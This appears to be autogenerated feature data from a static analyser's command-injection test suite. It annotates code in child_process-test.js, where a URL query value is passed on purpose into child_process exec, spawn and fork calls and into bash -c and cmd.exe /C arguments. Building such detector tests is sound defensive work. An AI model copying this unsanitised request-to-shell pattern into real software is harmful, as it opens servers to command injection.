args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:13:28:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:20:28:31 | {shell: cmd} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:25 | shell | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:25 | shell | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:25 | shell | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:25 | shell | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:25 | shell | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:21:28:30 | shell: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | InputAccessPathFromCallee | 1.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | exceptional return of cp.exec ... cmd}}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | exceptional return of cp.exec ... cmd}}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | exceptional return of cp.exec ... cmd}}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | exceptional return of cp.exec ... cmd}}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | exceptional return of cp.exec ... cmd}}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:8:29:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:8:29:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:8:29:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:8:29:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:8:29:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:13:29:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:20:29:37 | {env: {PATH: cmd}} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:23 | env | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:23 | env | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:23 | env | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:23 | env | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:23 | env | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:21:29:36 | env: {PATH: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | InputAccessPathFromCallee | 1.env | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | assignedToPropName | env | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:26:29:36 | {PATH: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:30 | PATH | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:30 | PATH | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:27:29:30 | PATH | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp 